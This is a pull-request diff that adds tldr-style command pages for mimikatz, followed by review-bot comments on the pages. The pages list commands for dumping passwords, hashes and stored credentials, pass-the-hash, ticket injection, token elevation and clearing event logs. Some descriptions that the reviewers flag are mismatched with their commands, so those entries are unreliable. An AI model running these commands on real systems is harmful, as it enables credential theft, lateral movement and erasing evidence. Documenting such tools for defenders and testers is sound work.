diff --git a/pages/windows/mimikatz-crypto.md b/pages/windows/mimikatz-crypto.md new file mode 100644 index 0000000000..5f4afe4fdc --- /dev/null +++ b/pages/windows/mimikatz-crypto.md @@ -0,0 +1,16 @@ +# mimikatz crypto + +> Manipulate Windows cryptographic services and certificates. +> More information: . + +- List cryptographic providers: + +`mimikatz "crypto::providers"` + +- List keys in a cryptographic provider: + +`mimikatz "crypto::capi"` + +- Export certificates and keys: + +`mimikatz "crypto::certificates /export"` diff --git a/pages/windows/mimikatz-dpapi.md b/pages/windows/mimikatz-dpapi.md new file mode 100644 index 0000000000..ba29a98ab4 --- /dev/null +++ b/pages/windows/mimikatz-dpapi.md @@ -0,0 +1,16 @@ +# mimikatz dpapi + +> Interact with the Windows Data Protection API (DPAPI). +> More information: . + +- List master keys: + +`mimikatz "dpapi::masterkey /list"` + +- Decrypt a DPAPI blob: + +`mimikatz "dpapi::blob /in:blob_file.bin"` + +- Retrieve Chrome credentials using DPAPI: + +`mimikatz "dpapi::chrome /in:Login Data"` diff --git a/pages/windows/mimikatz-event.md b/pages/windows/mimikatz-event.md new file mode 100644 index 0000000000..a64ab161fd --- /dev/null +++ b/pages/windows/mimikatz-event.md @@ -0,0 +1,12 @@ +# mimikatz event + +> Manage Windows Event Log records. +> More information: . + +- Clear event logs: + +`mimikatz "event::clear"` + +- Display event log sources: + +`mimikatz "event::providers"` diff --git a/pages/windows/mimikatz-kerberos.md b/pages/windows/mimikatz-kerberos.md new file mode 100644 index 0000000000..c60839f9b7 --- /dev/null +++ b/pages/windows/mimikatz-kerberos.md @@ -0,0 +1,16 @@ +# mimikatz kerberos + +> Interact with Kerberos tickets. +> More information: . + +- List current Kerberos tickets: + +`mimikatz "kerberos::list"` + +- Purge all Kerberos tickets: + +`mimikatz "kerberos::purge"` + +- Inject a ticket from a `.kirbi` file: + +`mimikatz "kerberos::ptt ticket.kirbi"` 
diff --git a/pages/windows/mimikatz-lsadump.md b/pages/windows/mimikatz-lsadump.md new file mode 100644 index 0000000000..eed787edc1 --- /dev/null +++ b/pages/windows/mimikatz-lsadump.md @@ -0,0 +1,17 @@ +# mimikatz lsadump + +> Dump secrets from the Windows Local Security Authority (LSA). +> Requires SYSTEM privileges. +> More information: . + +- Dump SAM hashes: + +`mimikatz "lsadump::sam"` + +- Dump secrets from the SECURITY hive: + +`mimikatz "lsadump::secrets"` + +- Dump cached domain credentials: + +`mimikatz "lsadump::cache"` diff --git a/pages/windows/mimikatz-misc.md b/pages/windows/mimikatz-misc.md new file mode 100644 index 0000000000..e8d1e37990 --- /dev/null +++ b/pages/windows/mimikatz-misc.md @@ -0,0 +1,16 @@ +# mimikatz misc + +> Miscellaneous system and utility commands. +> More information: . + +- Trigger Blue Screen of Death (for testing): + +`mimikatz "misc::bsod"` + +- List loaded kernel drivers: + +`mimikatz "misc::minidump"` + +- Change system time: + +`mimikatz "misc::systemtime"` diff --git a/pages/windows/mimikatz-net.md b/pages/windows/mimikatz-net.md new file mode 100644 index 0000000000..590859f0ff --- /dev/null +++ b/pages/windows/mimikatz-net.md @@ -0,0 +1,16 @@ +# mimikatz net + +> Perform network and domain operations. +> More information: . + +- List domain users: + +`mimikatz "net::users"` + +- List domain computers: + +`mimikatz "net::computers"` + +- Retrieve domain controller information: + +`mimikatz "net::domaincontrollers"` diff --git a/pages/windows/mimikatz-privilege.md b/pages/windows/mimikatz-privilege.md new file mode 100644 index 0000000000..830b4b8d05 --- /dev/null +++ b/pages/windows/mimikatz-privilege.md @@ -0,0 +1,12 @@ +# mimikatz privilege + +> Manage privileges for mimikatz operations. +> More information: . + +- Enable debug privilege (required for many modules): + +`mimikatz "privilege::debug"` + +- Check current privilege state: + +`mimikatz "privilege::whoami"` 
diff --git a/pages/windows/mimikatz-process.md b/pages/windows/mimikatz-process.md new file mode 100644 index 0000000000..d637b4b52d --- /dev/null +++ b/pages/windows/mimikatz-process.md @@ -0,0 +1,12 @@ +# mimikatz process + +> Manage process privileges and tokens. +> More information: . + +- List processes with their tokens: + +`mimikatz "process::list"` + +- Elevate mimikatz to a SYSTEM process: + +`mimikatz "process::token /user:NT AUTHORITY\SYSTEM"` diff --git a/pages/windows/mimikatz-sekurlsa.md b/pages/windows/mimikatz-sekurlsa.md new file mode 100644 index 0000000000..ab308aa914 --- /dev/null +++ b/pages/windows/mimikatz-sekurlsa.md @@ -0,0 +1,17 @@ +# mimikatz sekurlsa + +> Extract credentials and secrets from memory. +> Requires debug privileges. +> More information: . + +- Extract plaintext passwords: + +`mimikatz "sekurlsa::logonpasswords"` + +- List Kerberos tickets in memory: + +`mimikatz "sekurlsa::tickets"` + +- Dump LSA secrets: + +`mimikatz "sekurlsa::secrets"` diff --git a/pages/windows/mimikatz-service.md b/pages/windows/mimikatz-service.md new file mode 100644 index 0000000000..044d77834c --- /dev/null +++ b/pages/windows/mimikatz-service.md @@ -0,0 +1,16 @@ +# mimikatz service + +> Manage Windows services through mimikatz. +> More information: . + +- Start a service: + +`mimikatz "service::start service_name"` + +- Stop a service: + +`mimikatz "service::stop service_name"` + +- Delete a service: + +`mimikatz "service::delete service_name"` diff --git a/pages/windows/mimikatz-standard.md b/pages/windows/mimikatz-standard.md new file mode 100644 index 0000000000..29d6d5c551 --- /dev/null +++ b/pages/windows/mimikatz-standard.md @@ -0,0 +1,16 @@ +# mimikatz standard + +> Basic commands and mimikatz environment management. +> More information: . + +- Display system information: + +`mimikatz "standard::info"` + +- Clear the mimikatz command history: + +`mimikatz "standard::clearev"` + +- Show command history: + +`mimikatz "standard::history"` 
diff --git a/pages/windows/mimikatz-token.md b/pages/windows/mimikatz-token.md new file mode 100644 index 0000000000..3d210651e7 --- /dev/null +++ b/pages/windows/mimikatz-token.md @@ -0,0 +1,16 @@ +# mimikatz token + +> List and manipulate security tokens. +> More information: . + +- List tokens: + +`mimikatz "token::list"` + +- Elevate privileges by impersonating a token: + +`mimikatz "token::elevate"` + +- Revert to original token: + +`mimikatz "token::revert"` diff --git a/pages/windows/mimikatz-vault.md b/pages/windows/mimikatz-vault.md new file mode 100644 index 0000000000..07c40107ef --- /dev/null +++ b/pages/windows/mimikatz-vault.md @@ -0,0 +1,12 @@ +# mimikatz vault + +> Extract credentials stored in the Windows Credential Vault. +> More information: . + +- List vault credentials: + +`mimikatz "vault::list"` + +- Dump all vault credentials: + +`mimikatz "vault::cred"` diff --git a/pages/windows/mimikatz.md b/pages/windows/mimikatz.md new file mode 100644 index 0000000000..02a4e61ae3 --- /dev/null +++ b/pages/windows/mimikatz.md @@ -0,0 +1,37 @@ +# mimikatz + +> Interact with Windows credentials, perform credential dumping, token manipulation, and more. +> Requires administrator privileges and typically runs on Windows. +> More information: . + +- Run mimikatz in interactive mode: + +`mimikatz` + +- Enable debug privileges (needed for most operations): + +`mimikatz "privilege::debug"` + +- List available logon sessions: + +`mimikatz "sekurlsa::logonpasswords"` + +- Dump plaintext passwords, NTLM hashes, and Kerberos tickets from memory: + +`mimikatz "sekurlsa::logonpasswords"` + +- Pass-the-Hash with a specific NTLM hash and launch a command: + +`mimikatz "sekurlsa::pth /user:{{username}} /domain:{{domain}} /ntlm:{{hash}} /run:{{cmd}}"` + +- Dump local SAM database hashes: + +`mimikatz "lsadump::sam"` + +- Extract Kerberos tickets and export to a file: + +`mimikatz "kerberos::list /export"` + +- Exit mimikatz: + +`exit`
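Review bot: Every new page carries an empty `> More information: .` line (all fourteen files, mimikatz-crypto.md through mimikatz.md); the tldr page format expects a URL in angle brackets there, so each page needs a link to the upstream mimikatz documentation before this can merge.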
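Review bot: mimikatz.md lists `mimikatz "sekurlsa::logonpasswords"` twice under different descriptions ("List available logon sessions" and "Dump plaintext passwords, NTLM hashes, and Kerberos tickets from memory"); the command and its output are identical, so drop the first entry or give it a distinct command, otherwise the page misleads a reader into thinking the "list" form is a read-only enumeration.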
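Review bot: placeholder syntax is inconsistent across the set: mimikatz.md uses the tldr `{{placeholder}}` form (`/user:{{username}}`, `/ntlm:{{hash}}`, `/run:{{cmd}}`), while the subcommand pages hard-code literal values, e.g. `mimikatz "dpapi::blob /in:blob_file.bin"`, `mimikatz "kerberos::ptt ticket.kirbi"` and `mimikatz "service::start service_name"`; wrap every user-supplied value in `{{...}}` so the pages follow the project convention.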
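Review bot: in mimikatz-dpapi.md the argument in `mimikatz "dpapi::chrome /in:Login Data"` contains an unquoted space inside the already double-quoted command, so the value will be split at the space and the command will not receive the intended file path; the same problem affects `mimikatz "process::token /user:NT AUTHORITY\SYSTEM"` in mimikatz-process.md. Use a `{{path/to/file}}`-style placeholder and show the inner quoting the value needs.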
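Review bot: mimikatz-misc.md pairs the description "List loaded kernel drivers" with `mimikatz "misc::minidump"`; a minidump is a memory dump, not a driver listing, so either the description or the command is wrong and should be checked against the module's own help output. In the same file, "Trigger Blue Screen of Death (for testing)" should state plainly that `misc::bsod` crashes the host and loses unsaved state, since the one-line description is all a tldr reader sees before running it.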
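Review bot: mimikatz-standard.md describes `mimikatz "standard::clearev"` as "Clear the mimikatz command history", but `clearev` is the conventional name for clearing event logs, the action this PR documents separately as `mimikatz "event::clear"` in mimikatz-event.md; the description and the command disagree. Verify which is meant and, if the command clears event logs, say so explicitly, because a reader must not wipe logs while expecting to clear a shell history.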
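Review bot: mimikatz-sekurlsa.md documents `mimikatz "sekurlsa::secrets"` as "Dump LSA secrets" while mimikatz-lsadump.md documents `mimikatz "lsadump::secrets"` as "Dump secrets from the SECURITY hive"; the two entries describe the same data under different modules. Confirm that the sekurlsa variant exists in that module's help and drop it if it does not; if both exist, the descriptions should state how they differ.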
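Review bot: mimikatz-process.md ("Elevate mimikatz to a SYSTEM process" via `process::token`) and mimikatz-token.md ("Elevate privileges by impersonating a token" via `mimikatz "token::elevate"`) document the same outcome on two pages, and the process page's header "Manage process privileges and tokens" overlaps the token page's "List and manipulate security tokens"; keep the elevation entry on one page and add a `> See also:` line to the other, so the two pages do not drift apart.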